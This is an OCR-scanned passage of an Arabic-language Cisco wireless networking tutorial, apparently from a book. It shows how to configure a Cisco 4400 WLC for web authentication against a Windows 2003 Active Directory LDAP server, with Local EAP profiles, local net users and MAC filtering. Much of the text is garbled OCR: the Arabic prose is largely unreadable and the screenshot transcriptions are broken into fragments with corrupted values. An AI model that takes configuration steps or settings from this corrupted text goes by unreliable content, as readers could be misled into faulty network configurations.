r CuTTcd TA.C*CS< **>. C ■=■■£ altrfi Vi XC*L\trA.ri* Jh krlbrO 

r L'XJ IJf4j!I mfjV-M ItMc■ j P.tri el*. Twn lh . *»+ CNhwI 

l~ I m] I'il'l -i Timr-a - ^ y'jrl • I *. 'inn ftanl 

r* hr 7 - v □ ftJN !:iyj£ £fwh rfa wi'h i.H*crrj-fKi Stt Ihix J- *■ -H 1 ban! 

P M*I«K -i ll- ivfti It MUre-ti ffti fWtfl *'H ^-v> r - i tkM :Wi 

| -.Pi ■: | -. : > - . r | tr>:*\ 


read-only j ^juI! read-write oU“>Ui 


Juo^J clJJi _l*J 
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4 A\ I Aj \\ L " 4 S. n n\l ^3 


I Us<.r 
| Stiup 


ais 


I Intrrfic? 

'| Cmifiyjr-j't.ioi 


?ul 


Extern si (Jrer 
Eriitustt 


Hl|! 




I R <• p •: rt ; tud 
I Activity 


a?iE 


Account Doable 


U 


^ Never 

^ Disable account if; 
f~ Date exceeds: 

r Failed attempt? exceed: 

[s 


jsep [ii” 12o11 


Failed attempts since last successful login; 0 
P Reset current failed attempt? count on submit 



IETF RADIUS Attributes 

F? [DOS] Service-Type 




Authenticate only jyj 






iCTjronwwwwi 


^ Back to Help 

quluuunj - -- 

Callback NAS Prompt 
Administrative 

Callback Administrative 
Callback login 

Framed 

Login 


Submit | Ca 

Callback framed 



WLC Configuration 

Security > AAA > RADIUS3 > pi 


i v 


AHtt v 


RADIUS Authentication Servers > New 
Server Jndvx (Vriurhy) 

Survar IP Address 
Slirimri fiRmit Fnnr.il 
Shared St;i:iTH:l 

confirm Shored a a cre! 

Key Wrap 
Port Number 
KRFuer Statue 
Support form C 3576 
3grver i iin nodi 
\elwirk User 


tiu. 


n for PIP'S- customers end requires a key conmUiem PAD1US stiver] 

ml 


I nnh-ir-d v 

L n d b -1 f d v 

a »nvHti 
El Enable 
EJ fn.iblif 
□ Eiiahlt 


I IJBlilFfli 

I Disabled 


Authentication 


2 

3 

4 

5 

6 

7 

8 

9 

10 
11 
12 

13 

14 

15 

16 

XL. 


j*ibL« yo j RADIUS jJjj }jy* 17 oi Jj/RJi ( * ? kc^Server Index (Priority) : 
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4 \\\,^\W ClAfLujoll Jyd ^3 jjuflia, 


jlypServer IP Address : 
hexadecimal^ ASCII j3j L\ oUK" J^Shared Secret Format : 
jlTUi £• jjJ .i SulT jUkShared Secret/Confirm Shared Secret : 
AES (Advanced Encryption Standard)fikj ^/\ JSUj jjiadiKey Wrap : 

Jb^ry oj^Port Number : 
}jy Jl J-k*; y J^L'Server Status : 
«.bf JjSyyyi J^L": Support for RFC 3576 
4jij 30 (3 1 2 * Server Timeout 

iSCkU J^p J^i;Network User : 

Security -^ > A.A.A. -^ > s^uLaSi ej_*> bJ ojIjLj «apk L^yp j^?ry.l sjbal 

RADIUS3 > Authentication 



AAA Server^^Ji ^ jjyJ I jb^i p WLANs > Edit Jl J^jJb yj^Ji 104 4SUJ1 -kjj Ujuo ^ 

WLANs > Edit 

General Security QoS Advanced 
Layer 2 Laver 3 AAA Servers |_ 

Select AAA servers below to override use of default servers on this WLAN 
Radius Servers 

Authentication Servers Accounting Servers 

0 Enabled 

Server 1 
Server 2 
Server 3 

Local EAP Ai 

Local EAP 


IP:10.10.1.254, Port:1812 v None v 
IP;10.100.1 1 J Port; 1012 ZEE Nunc M 

]S 

1 IP :10.9,4 .10, Poft: 1012 
IP:1G.ID.1.254, Port:1812 
' IPilO.lDO.l.l, Port: 1312 
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4 \\\, AA\' ClAfLujoll ^3 jjuflia,A' 


Win 2003 AD LDAP yjwJi 


Layer 2 Switch 



Web Authentication Client 

i^r\y. Lightweight Directory Access Protocol (LDAP) jJ'jS L* 

Microsoft Windows 2003 server ^Lb^b dlL j web authentication c—oj as>cJl^ 

^-jJ j S JL^ Layer 3 security 4±iu!i uLJi j ^Ui jya jbd ^ Web authentication j^u j 

C ^ I 1 ^LkJLS ^A^C_/la»L*I 

j Lightweight Access Points (LAPs) o^lapt _j ^lapb idbaJ byS-o ol bj& 
j Lightweight Access Point Protocol (LWAPP) JjSyy^Jb j Cisco WLCs 

domain controllers j Active Directory j jijw> JjJjjj JuaLJl Aaj^2j 43^x4 


aJLJI j o I Axil 




LU do Ij Li" J 4j2jLvJ| J-yLil Jl^XJ J 


• Cisco 4400 WLC that runs firmware release 5.1 

• Cisco 1232 Series LAP 

• Cisco 802.1 la/b/g Wireless Client Adapter that runs firmware release 4.2 
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4 \\\, ^\W ClAfLujoll Lyd ^3 


• Microsoft Windows 2003 server that performs the role of the LDAP 
server 


Configure LDAP Server 


oUIj aApUL) jJb Lightweight Directory Access Protocol (LDAP) 
ola ijiji Microsoft Windows 2003 server La j! 3 scJaAi 

Active Directory eJ-'i « ;u*il 


aSUJi u ( ^ a j j Organizational Unit (OU) 



4 n*« - 

| D „9 if-^J^rtlMDireciWY Umj..- ■ lO^SJ Wi 


wireless-users OU J^b aSLlJi obL-^- ^ f 


L-bii ^ ^aJl ^ ^a bAL ^_aI 

Start (Jj lAL j ijLa 2003 jj-ujj oij.ii ®byi x£ ol A.DSI Edit tool 

CN=Services > CN=Windows Ji Jik^i *• > Run > Type: ADSI Edit.msc 
CN=Directory Service jUaM j NT > CN=Directory Service 
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4 \\\, ^\W ^3 Jjuflia, 



0000002 Ji 2 u^Ji ^ j dsHeuristics JLp _k^t Attributes ^ f 

4 ^JLJJ| 4 ^\^X«U ^gj^gjl 1 ^ 1 x 3 \jj£ J 




A::ifaul* Edict | S®cur!^ | 

F? ^ho^njardalny aJijitdtes 

I? ShorvssjiiortglaiiibuiK 

I - SI>dai dhibiJes Ihal have wsJi.f-- 


Atfibulpt 


■'■HjlUit! 

| Sjrta* | 

Vdue *1 

cvnriciHwt 

(Uniqod? S-lihg 

hi widc^VC^nliguiflrign 

iin 

JiYcods 1 lis-i- 

D ifritmN SeivicE 

creale-Tmh5tamp 

UfC Coded TL. 

9/fl/2DI]012:36(15 PM 

Lhsuii^un 

UriLLTk 3liriy 

cN^Sefr 

dnecCReoDHs 

iDisliiiflUShstf ... 


<f$pJeyM*Te 

Uricwte Siihg 

<MotSet> 

cisjjavHamcPnrtflbie 

lA&SbvHi 

<N^3et> 

d s h ngu sh c cM a me 

Distinijjshed 

CM -Dhedtaijr Savhe.CN 

dSASrgrdburE 

Octal 5limcp 

CNulSeb 

dSCrrePiDpaqalranlJ 

. UIC Ceded IL 

CHriSd;* 

(EHetirisfte 

tlncoda Elihg 

COO0CO2 

etferabnMame 

Urpcode Shhg 

*Noi Set> , 

, flaw 

iniKiei 

<m.$& -II 

J 

__1 

jj 


Fiji 


UK 


Far r.H 




Mrinrj Attribute Lrflitar 


fltiiixiie. dSBeyirits 

|tiirri]ij>5 

Char 



^y2jLy2_>- ^lp C .A.D ^ y&J dJJi wCxj 

4-iCLuMil 45 LjJ1j a^UL! OU j 
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View Advanced s^uLi of ^ ai'LSL ^ ^k, i ou Security Ji Ujuj 

aL*jla Features 



ANONYMOUS LOGON ^ Add k • 

































































Select Users, Computers, or Groups 


Select this object type: 


H.+:+.+. 


4 \\\, ^\W djlSjjoJl 0-' C5^ Xlll 

..?J x| 


jllsers. Groups, or Built-in security principals 

Object Types... 

From this location: 

j lab. wireless 

Locations... j 


Enter the object names to select [examples ]: 



Advanced... 


OK 


Cancel 


A 


Userl Properties 




-kii Read ^ 

? j xj 


Environment! Sessions] Remote control ] Terminal Services Profile ] C0M + 
General j Address | Account | Profile | Telephones | Organization 


Published Certificates j Member Of ] Dial-in ] Object 


Security 


Group or user names: 


& Account Operators (LAB\Account Operators) 
0 Administrators (LAB ^Administrators) 


ANONYMOUS LOGON 





Authenticated Users 



(33 Cert Publishers (LAB\Cert Publishers) 

_■ A 1 ■ ■■ 1 I~. 1 I"-._■ A 1 \ 


IP 


Add... | 

Remove j 

Permissions for ANONYMOUS LOGON 

Allow 

Deny 

Full Control 

□ 

□ £ 

Read 

El 

□ j 

Write 

□ 

□ if 

Create All Child Objects 

□ 

□ ill 

Delete All Child Objects 

□ 

□ 

Allowed to Authenticate 

□ 

G tJ 


For special permissions or for advanced settings, 
click Advanced. 


Advanced 



OK 


Cancel 


Apply 


f- 
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4 \\\, ^\W ClAfLulll 


Use LDP to Identify the User Attributes 


^IwLpI IjLDAP Lvll0H-t clr 4 ^IwL>cjLi>»I j O^yi 

^jjLj j AD j ^jLib^ a^c^j j LDAP jijwj aLjjJ di^^yi ^jJi 

C 4-JtxJl \>zJup J^jL-«J| JajI^JI 4JL^ j j JjJj>cIj 

jijwJb Juy^jl ^ ^x$l 



4->rA«,rgj 1 


Connection Browse 


Options Utilities 


-Ini > 

Hel[ 


El DC=WIRE LESS, DC=L' 


J iJ 


0x0 = Idap unbind(ld); 

Id = ldap_openn 0.8.22.44", 389); 

Established connection to 10.8.22.44. 

Retrieving base DSA information... 

Result <0>: (null) 

Matched DNs: 

Getting 1 entries: 

» Dn: 

1 > currentTime: 3/18/2013 11:54:3 Arab Standard Time Arab Standard Time; 

1 > subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL 
1> dsServiceName: CN=NTDS 

Settings,CN=1142-ISFC-V01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=WIRELESS,DC=LOCAL 
3> namingContexts: DOWIRELESS.DOLOCAL CN=Configuration»DC=WIRELESS,DOLOCAL 
CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL 

1> defaultNamingContext: DC=WIRELESS,DC=LOCAL 

1 > schemaNamingContext: CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL 
1 > configurationNamingContext: CN=Configuration,DC=WIRELESS,DC=LOCALj 
1> rootDomainNamingContext: DC=WIRELESS,DC=LOCAL 

23> supportedControl: 1.2.840.113556.1.4.319; 1.2.840.113556.1.4.801; 1.2.840.113556.1.4.473; 1.2.840.113556.1.4.528; 
.2.840.113556.1.4.417; 1.2.840.113556.1.4.619; 1.2.840.113556.1.4.841; 1.2.840.113556.1.4.529; 1.2.840.113556.1.4.805; 
.2.840.113556.1.4.521; 1.2.840.113556.1.4.970; 1.2.840.113556.1.4.1338; 1.2.840.113556.1.4.474; 1.2.840.113556.1.4.1339; 
.2.840.113556.1.4.1340; 1.2.840.113556.1.4.1413; 2.16.840.1.113730.3.4.9; 2.16.840.1.113730.3.4.10; 1.2.840.113556.1.4.1504; 
.2.840.113556.1.4.1852; 1.2.840.113556.1.4.802; 1.2.840.113556.1.4.1907; 1.2.840.113556.1.4.1948; 

2> supportedLDAPVersion: 3; 2; 

12> supportedLDAPPolicies: MaxPoolThreads; MaxDatagramRecv; MaxReceiveBuffer; InitRecvTimeout; MaxConnections; 
MaxConnldleTime; MaxPageSize; MaxQueryDuration; MaxTempTableSize; MaxResultSetSize; MaxNotificationPerConn; 
MaxValRange; 

1> highestCommittedUSN: 12449; 

4> supportedSASLMechanisms: GSSAPI; GSS-SPNEGO; EXTERNAL DIGEST-MD5; 

1> dnsHostName: 1142-ISFC-V01 .WIRELESS.LOCAL 
1> IdapServiceName: WIRELESS.LOCAL:1142-isfc-v01$@WIRELESS.LOCAL 
1> serverName: 

CN=1142-ISFC-V01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=WIRELESS,DC=LOCAL 
3> supportedCapabilities: 1.2.840.113556.1.4.800; 1.2.840.113556.1.4.1670; 1.2.840.113556.1.4.1791; 

1> isSynchronized: TRUE; 

1> isGlobalCatalogReady: TRUE; 

1 > domainFunctionality: 0 = ( DS_BEHAVIOR_WIN2000 ); 

1 > forestFunctionality: 0 = ( DS_BEHAVIQR_WIN2000 ); j 
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4 \\\, ^\W ClAfLulll 


userl y&*i BaseDN jL~. ^jSI j tree ^ view suiliJl J^jJL ^ 

2JbJi jg br' OU=wireless-users, DC=WIRELESS, DC=LOCAL > »jU-> 


=LOCAL 


Connection Browse View Options Utilities 


.JSI 

h 



CN=userl. 

CN=user2. 


Getting 1 entries: 

» Dn: 

1 > currentTime: 3/18/2013 11:54:3 Arab Standard Time Arab Standard Time; 

1 > subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCALj 
1> dsServiceName: CN=NTDS 

SettingsXN=1142-ISFC-V01,CN=Servers,CN=Default-First-Site-Name.CN=Sites.CN=Configuration,DC=WIRELESS,DC=LOCAL; 

3> namingContexts: DC=WIRELESS,DC=LOCAU CN=Configuration,DC=WIRELESS,DC=LOCAL; 
CN=Schema,CN=Configuration,DC=WIRELESS.DC=LOCALj 

1> defaultNamingContext: DC=WIRELESS.DC=LOCALj 

1 > schemaNamingContext: CN=SchemaXN=Configuration,DC=WIRELESS,DC=LOCALj 
1 > configurationNamingContext: CN=Configuration,DC=WIRELESS,DC=LOCAU 
1> rootDomainNamingContext: DC=WIRELESS,DC=LOCAU 

23> supportedControl: 1.2.840.113556.1.4.319; 1.2.840.113556.1.4.801; 1.2.840.113556.1.4.473; 1.2.840.113556.1.4.528; 
1.2.840.113556.1.4.417; 1.2.840.113556.1.4.619; 1.2.840.113556.1.4.841; 1.2.840.113556.1.4.529; 1.2.840.113556.1.4.805; 
1.2.840.113556.1.4.521; 1.2.840.113556.1.4.970; 1.2.840.113556.1.4.1338; 1.2.840.113556.1.4.474; 1.2.840.113556.1.4.1339; 
1.2.840.113556.1.4.1340; 1.2.840.113556.1.4.1413; 2.16.840.1.113730.3.4.9; 2.16.840.1.113730.3.4.10; 1.2.840.113556.1.4.1504; 

1.2.840.113556.1.4.1852; 1.2.840.113556.1.4.802; 1.2.840.113556.1.4.1907; 1.2.840.113556.1.4.1948; 

2> supportedLDAPVersion: 3; 2; 

12> supportedLDAPPolicies: MaxPoolThreads; MaxDatagramRecv; MaxReceiveBuffer; InitRecvTimeout; MaxConnections; 
MaxConnldleTime; MaxPageSize; MaxQueryDuration; MaxTempTableSize; MaxResultSetSize; MaxNotificationPerConn; MaxValRange; 
1> highestCommittedUSN: 12449; 

4> supportedSASLMechanisms: GSSAPI; GSS-SPNEGO; EXTERNAL; DIGEST-MD5; 

1> dnsHostName: 1142-1SFC-V01 .WIRELESS.LOCAL 

1> IdapServiceName: WIRELESS.LOCAL:1142-isfcv01 $@WIRELESS.LOCAL 
1> serverName: 

CN=1142-ISFC-V01XN=ServersXN=Default-First-Site-NameXN=SitesXN=Configuration,DC=WIRELESS,DC=LOCAL 
3> supportedCapabilities: 1.2.840.113556.1.4.800; 1.2.840.113556.1.4.1670; 1.2.840.113556.1.4.1791; 

1> isSynchronized: TRUE; 

1> isGlobalCatalogReady: TRUE; 

1> domainFunctionality: 0 = ( DS_BEHAVIOR_WIN2000 ); 

1> forestFunctionality: 0 = ( DS_BEHAVIOR_WIN2000 ); 

1> domainControllerFunctionality: 2 = ( DS_BEHAVIOR_WIN2003 ); 


Expanding base ‘OU=wireless-users, DC=WIRELESS, DC=LOCAL‘... 

Result <32>: 0000208D: NameErr: DSID-03151EFD, problem 2001 (NO_OBJECT), data 0, best match of:l 
Matched DNs: DC=WIRELESS,DC=LOCAL 
Getting 0 entries: 


Ljj ±i 


, DC=WIRELESS.DC=LOCAL , l 


^JLp I^JLp j ajULj jfi(j\ \z>*. a/9 j \j j USCrS jLo ^1 p ^ 


userl 


Lj.,,, Idap://I142-ISFC-V01.WIRELESS.LOCAL/DC=WIRELESS,DC=LOCAL 


Connection Browse View Options Utilities 


-=iQj 


B OU=wireless-users, DC=WIRELESS, DC=LOCAL 


L No children 

B CN=user2, OU=wireless-users J DC=WIRELESS, DC=LOCAL 


CN=Person,CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL; 

Expanding base , CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL l ... 

Result <0>: (null) 

Matched DNs: 

Getting 1 entries: 

>> Dn: CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL 
4> objectClass: top; person; organizationalPerson; user; 

1> cn: userl; 

1> givenName: userl; 

1 > distinguishedName: CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL; 
1 > instanceType: 0x4 = (IT_WRITE ]; 

1 > whenCreated: 3/18/2013 10:40:38 Arab Standard Time Arab Standard Time; 

1 > whenChanged: 3/18/2013 11:7:40 Arab Standard Time Arab Standard Time; 

1> displayName: userl; 

1> uSNCreated: 12419; 

1> uSNChanged: 12446; 

1> name: userl; 

1> objectGUID: 6ab23e2f-9c68-4f85-9264-e6b8e49ba354; 

1> userAccountControl: 0x10200 = ( UF_NORMAL_ACCOUNT | 

UF DONT EXPIRE_PASSWD ); 

1 > badPwdCount: 0; 

1> codePage: 0; 

1> countryCode: 0; 

1> badPasswordTime: 0; 

1> lastLogoff: 0; 

1> lastLogon: 0; 

1 > pwdLastSet: <ldp error <0x0>: cannot format time field; 

1> primaryGroupID: 513; 

1> objectSid: S-1-5-21-2893340686-282350782-2825461547-1105; 

1> accountExpires: <ldp error <0x0>: cannot format time field; 

1> logonCount: 0; 

1> sAMAccountName: userl; 

1> sAMAccountType: 805306368; 

1> userPrincipalName: userl @WIRELESS.LOCAL; 

1 > objectCategory: 
CN=Person.CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL; 
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4 \\\,^\W ClAfLujoll Jj-oi ^3 jjuflila, 


c^JJt j User Base DN r ^ ^ L« ^ LD.A.P aIsjj} L y2j{ y^jAji5\Jl ^lapl a^p 
j User Attribute j OU=wireless-users, DC=WIRELESS, DC=LOCAL g^L^_ 
Person g^L^, g^JJi j User Object Type « sAMAccountName g;JJi 

Configure WLC for LDAP Server 

A >*j AD 2003 jjJl oULj e-tpliL aiajyj y^y^SsJl jLgjp (31 0*^1 

AAA > LDAP 


..I...I.. 

CISCO 

MONITOR WLANs 

Save Configuration 

CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS 

Ping Logout Refresh 

HELP FEEDBACK 

Security 

LDAP Servers 



New... | 


General 
▼ RADIUS 

Authentication 
Accounting 
Fallback 
» TACACS+ 

| LDaP ~| 

Local Net Users 


Server 

Index Server Address Port Server State Bind 

10.8.22.44 389 Enabled Anonymous Q 


LDP siAn ,y> iL— 4 u uSt«-i aJIiJi U New p 


ecurity 


LDAP Servers > New 


< Back Apply 


AAA 

General 
« RADIUS 

Authentication 
Accounting 
Fallback 
» TACACS+ 

LDAP 

Local Net Users 
MAC Filtering 
Disabled Clients 
User Login Policies 
AP Policies 

Local EAP 


Server Index (Priority) 
Server IP Address 
Port Number 
Simple Bind 
User Base DN 
User Attribute 
User Object Type 
Server Timeout 
Enable Server Status 


IE3 

10.8.22.44 

389 

[ Anonymous v 

DN OU=wireless-users, DC=WIRELESS, DC=LOCAL 

SamAccountName 

Person 

[2 seconds 
Enabled v 


Jl J^jJL j*j f apply f 


LANs WLANs 


WLANs 

WLANs 

Current Filter: None 

fChanae Filterl rclear Filterl 


Create New v Go | 


Advanced 

□ WLAN ID Type 

Profile Name 

WLAN SSID 

Admin Status Security Policies 



□ 1 WLAN 

MOE-students 

MOE-students 

Enabled Web-Auth 

Q 


□ 2 WLAN 

moe-manage 

manager 

Enabled WEP, Web-Auth 

□ 


































4 \\\,A\W ^3 


▼ WLANs 

WLANs 

► Advanced 


General Security QoS | A dvanced 

Profile Name 
Type 
SSID 
Status 


web 

Guest LAN 

web 

0 Enabled 


Security Policies Web-Auth 

(Modifications done under security tab will appear after applying the changes.) 


Ingress Interface 
Egress Interface 


None v | 

student-interfaces v 


j oi;ULl j&-\ f layer 3 j^\ £ security 


cM f 


▼ WLANs 

WLANs 

► Advanced 


General J Security | QoS j Advanced | 
Layer 2 Layer 3 AAA Servers 

Layer 3 Security None v] 

0 Web Policy - 
® Authentication 
O Passthrough 
O Conditional Web Redirect 
O Splash Page Web Redirect 
Preauthentication ACL None v] 

Over-ride Global Config 0 Enable 
Web Auth type | Internal 


\ 3 u*~j> »LUi H Ujikli oUL j&-\ J AAA Servers jjUi Js- J^oi 


▼ WLANs 

WLANs 

► Advanced 


General | Security | QoS Advanced 


Layer 2 | Layer 3 j AAA Servers 


Radius Servers 


Authentication Servers Accounting Servers 
D Enabled D Enabled 

Server 1 None v None 371 


Server 2 None 
Server 3 None 
Local EAP Authentication 


None 

None 


Local EAP Authentication ^Enabled 


Authentication priority order for 
web-auth user 


RADIUS 

LOCAL 




Order Used For Authentifal 

I LDAP I 


Up 


LDAP Servers 


Server 1 | IP:10.8.22.44, Port:389 37| 


Server 2 None 
Server 3 None 


http://l.l.l.l/login.html Jl cJy^l Js- L-V 
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4 \\\, ^\W ClAfLuIull Jj-oi ^3 


jdl j sJla j iijipi 2 uiJb wUp jiiiUj 9 u*^ gjjJi Virtual Interface Address 

C . 1 1 1_*^J 1 ^ 1 /L 



ad 2003 j #LUof 


• ■ •.. as.*/' * e 

:■„“■ -4 

■ft ~ 9 A 

1 -ngm 


(ISC# [; 


L'dak-i-mr Jullii* CilCa wird**-! hiltaal-k. 

» fiCwJi lil hVWHiii Ijiji tfltHffl£ilHi 

trwu r.:(*i« Piwn vj<r> iiphnuii w ic-ke ij ■*<«* 


Um IIhh 

PiriliVU-d 



Web Authentication j df j 



62 































































































































4 \\\, RA\' djl£jjuall ^3 


RADIUS 



RADIUS^ p; ^lU ^jp\s>- j£jy* ^ i l)I Owl^l liLa 

~\—j O C al il L^^wQwwvU ^ I I A/® wL^~ ^ Aj<j ^\ j l ^ P~ aI^^I^t - A/® *A^“ l^ U ^ *Aj2j 1_L^ 

j Ll2jl RADIUS JuJas wUp a 3?L2>-I A^a^cS"" o^SCj d)l u»jjL| dJj!i j aSCjaU 

aSCjaSi ^ RADIUS j£jy^ ois""lii (J l ^^ ci^ Local EA.P ou lal 

Ijji> t ~ L>r y ^ 3 -j^j ^l^iwwj Local EA.P aJ-p jJjjA^Jl d)U dUaJ 4iLa?^b 

(_£y>-l JljyjS' oULj^lJl dJjk jjy* ^Jal^j J jg AS AjJ^J>rlj ( y^>~ Aj I (_g\ 

AiL^I j A^jj-I dJjk OjJ^- ^ j UwUj L« j 4.1 A>c-^J| I$.Jj sy$>r\ (3 OwL>rj Aj^li! dJjk (l)li j*~L*U 

PEAP MS CHAP v2 (Microsoft Challenge A^C^I 1 , ^ Aj*^»**0 ^ j » Lji { J 1 .. ^ ^ 

Jl. o*>ui^ a^UjI a? 5 as^Ji j j PEAP GTC jHandshake Authentication Protocol) 

timeout 

Local EAP^iapi 

jujbr Jjlij^ J^J Security>Local EAP>Profiles a^a^Ji ^ j^of 


63 














4 \\\,^\W ClAfLuIull ^3 jjuflia, 


jt | Sayc eonfi^yratioBii Ping Logout ^e^nesh 

CISCO MONITOR WLANS CONTROLLER WlRELfiSS SfOjRlTY MANAGEMENT COMMANDS HELP FEEDBACK 


Security 

fr AAA 

t (Local' EAP 
General 
Profik* 

EAP-FAST Parameters 
Authentication Priority 

ib Priority Ordor 

► Certificate 

I 1 Access Control Lists 

. Wireless Protection 

f Policies 

► Web Auth 
b Advanced 


Local EAP Profiles 


Profile Name 


New,,, [ Apply 1 


EAP-IL5 PEAR 


Apply f 


t | t j j ^ Say* Configuration Ping Logout Refresh 

CISCO MONITOR WLANs CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS HE^P FEEDBACK 


Security 


Local EAP Profiles > New 


< Back | Apply 


PrufitR Name users 

▼ Local EAP 

General 

Profile 

EAP" FAST Parameters 
Authentication Priority 

► PHorily Order 

b Certificate 

b Access Control Lists 

. Wireless Protection 
Policies 

b WebAuth 

b Advanced 

-A-pjply PE.AJP ^ LEAP j l>-I ^ 


.1, * I „ Save COrfcfiggr^Sign Ping Logout j^frash 

* V] 1+1 | li 

CISCO MONITOR SLANS CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS HGL* FEEDBACK 


Security Local EAP Profiles M >—w... pj Apply I 


b AAA 

▼ Local IAP 
General 
Profiles 

EAR-FAST Parameters 
Authentication Priority 

b Priority Order 

> Certificate 

b Access Contra! Lists 

Wireless Protection 
Policies 

b WebAuth 

b Advanced 


Profile Name 

users 


LEAP EAP-FAST EAP-TLS REAP 

© © © © P 


* yjwJl \jd& l ^ ^ PwLowq Jjy]I «**»» su&. Ji di! 3 Users ^1p y?i 

Jbj ill oib CCNP Wireless ^ <j J^lSl l^JLp dyiu* 


64 



















• i | • * • | «• 



CISCO MONITOR 

WLANs CONTROLLER 

WIRELESS 

Security 

Local EAP Profiles > 
Edit 


► AAA 



^ Local EAP 

Profile Name 

users 

General 

Profiles 

LEAP 


EAP-FAST Parameters 
Authentication Priority 

EAP-FAST 

B\ 

► Priority Order 

EAP-TLS 

K) 

► Certificate 

► Access Control Lists 

. Wireless Protection 

PEAP 

Local Certificate 
Required 

Client Certificate 
Required 

(50 

Enabled 

[2 Enabled 

Policies 


Certificate Issuer 

Cisco ▼ 

¥ WebAuth 

► Advanced 

Check against CA 
certificates 

Verify Certificate CN 
Identity 

Check Certificate Date 
Validity 

? Enabled 

50 Enabled 

/ Enabled 


4 , i^XW ClAfLujoll lyol ^3 Jj l *\\ 


Ping Logout 


_<Back J Apply 



Security > Local EAP > EAP-FAST Parameters Js- J^aJb ^ dJUi 

A>cjLvia.ji olft jg^ EAP—FAS -L' ciUapi 


( | ( ( | ( Ea^e ConfiQuraiion ging Logout gefresh 

CISCO MONITOR ft LANS CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS HELP FEEDBACK 


Security 

* AAA 

w Local EAP 

General 

Proxies 

EAPrFAST Parameters 
Authentication Priority 

► Priority Order 

► Certificate 

► Access control Lists 

Wireless Protection 
Policies 


EAP-FAST Method Parameters 

Server Key (in he*) 

Confirm Server Key 
Time to live for the RAC 
Authority ]D *(i n heK) 

Authority ]D Information 
AnQ«ymao5 Provision 


i**# 

**** 

IQ days 
436973636f 
Cisco A- ID 
> EAAhita 


Apply 


► WebAulh 

I Advanced 


OjSC o! oj'V j jyLidi dJi « jiidJi j gj Ui ^bsii y>Server Key (in hexadecimal) : 

A-F j 9-0 jda- 4ju^Jb 


{jj 1000 Ji 1 ja pj j ^ikJi Ul» ^-j^J.1 idiTime to Live for the PAC 

(jr ^f joS jdp ^i_u> j 32 Authority ID (in hexadecimal) 

^UdJb d^Authority ID Information 


65 














4 \\\, AA\' ClAfLulll ^3 jjuflia, 


^ A \t A*J>i 


Security 


^ AAA 

General 
V RADIUS 

Authentication 
Accounting 
Fallback 
»TACACS+ 

| Local Net Use- ; "1 

Disabled Clients 
User Login Policies 
AP Polices 

V I Aral FAD 


(j UJ Security > AAA > Local Net User Js- J pi 

I IAJb ^ ^ ^Lp 


Local Net Users 


Items 0 to 0 of 0 


User Name WLAN Profile Guest User Role Description 


Aj ^k-X^l 


New Jai^l 


Sa^e Configuration Ping Logout Refresh 

LANs CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS HELP FEEDBACK 


Local Net Users > New 


< Back Apply 


User Name 
Password 
Confirm Password 
Guest User 
WLAN Profile 
Description 


nader 



4j>t i^aJl Li 






J diLv^b L<»^ 01 wl*J 


*i|l.f| l. 


Spy® CowFiggristign Ping Uiflggt S' 


MONITOR ftLANs CONTROLLER W|R£JUESS SECURITY hs^asehent COMMANDS help e^edbac 


Security 


Local Net Users 


t AAA 


General 


t RADIUS 

Auth*nt>iMt«>ni 

AeeCufWina 

Fallback 

1 TACACSr 

User Name 

WLAN Profile 

Guest 

User 

Items 1 

Role 

to 2 

of 2 

Description 

LDAP 

LPCflll Net U5*r$ 

nader 

An* WIAN 

NO 

rtc a 


Manager 

MAC Filtering 

D*wb*«i 

User Login Pel ides 
ap Fgligiw 

Mitt 

Any W1_AN 

ves 



guest only 


v Local EAR 


Security > Local EAP > ^ Local EAP 3y^Jy dLi 

Microsoft aji y jJy y^ UaJ LDAP ol ^Authentication Priority 


Active Directory 
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4 \\\, AA\' ClAfLuIull O-' C5^ J 1 *\\ 


Priority Orders Local-Auth 

User Credentials 


Only LDAP is used 



LDAP is used only if the local 
list does not contain the user 


Priority Order > Local-Auth 

User Credentials 


ikufjH li up J 
LDAP 

1 Down 1 


j Advanced pH- Security I y e WLANs>Edit I y jJyJi il& dUi -u> 

4 jj yi^\ * y jLxd 


MONITOR WLANs CONTROLLER WIRELESS SECURITY MANAGEMENT COMMANDS HEU* FEEOBA 


1 


WLANs > Edit 


General Security QoS Advanced 


Layer 2 Layer 3 

Radius Servers 


AAA Servers 


Authentication Servers Accounting Servers 
Enabled Enabled 

Server! None - None - 

server 2 None J None"T| 

Server 3 None "rl None ■*■ I 


Local PAP Authentication 


Local EAP Authentication 

y 'enabled 


EAP Profile Name 

users * 


Authentication orioritv order for 



webauth user 


: Back 


Apply 


LDAP Server „ 


Server 

1 

Server 

3 

Server 

3 


H at Used 

Order Used For Authentication 


LDAP 

Iwal 

LOCAL * 

I Up I 


RADIUS 





' r 

L^-l 

- 

Ocnwfi 







in_ 
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4 \\\, ^\W ^3 Jjuflia, 


MAC Address Filtering 


MAC Address Filtering 



MAC Address Filter List 
Enter MAC Addross in this format xxxxxxxxx 
CWireless Client MAC list) 

MAC Address 1-20 v 

MAC 01: 00-09-6F-57-01 -62 MAC 11 
MAC 02: 45-B9-31-B1-5C-22 MAC 12 
MAC 03: MAC 13: 


10-8A-41-2E-AD-75 


Data Link AiLkJli c L^JL^aiI * (j)wLil AJliil 3 jUaj 

12 ^ j is^i jj&s ^ jjjLp ^ j Media Access Control address jfMAC address 
4 -ow*jIwL^J| j j F A j 9 ^1,1 0 j-J^P <-j>y>- 

01-23-45-67-89-Ji* - jt : oU^ ^ laSC ^Hexadecimal 

ab 0123.4567.89 Jia oLpj^ ^ oIjjjJi o^So ^ ^ ilL* j ab, 01:23:45:67:89:ab 

Uij j l ij>- I ^ jljJjJl cl)jSo (3 j 


3 

o 

CO 

(0 

(O' 

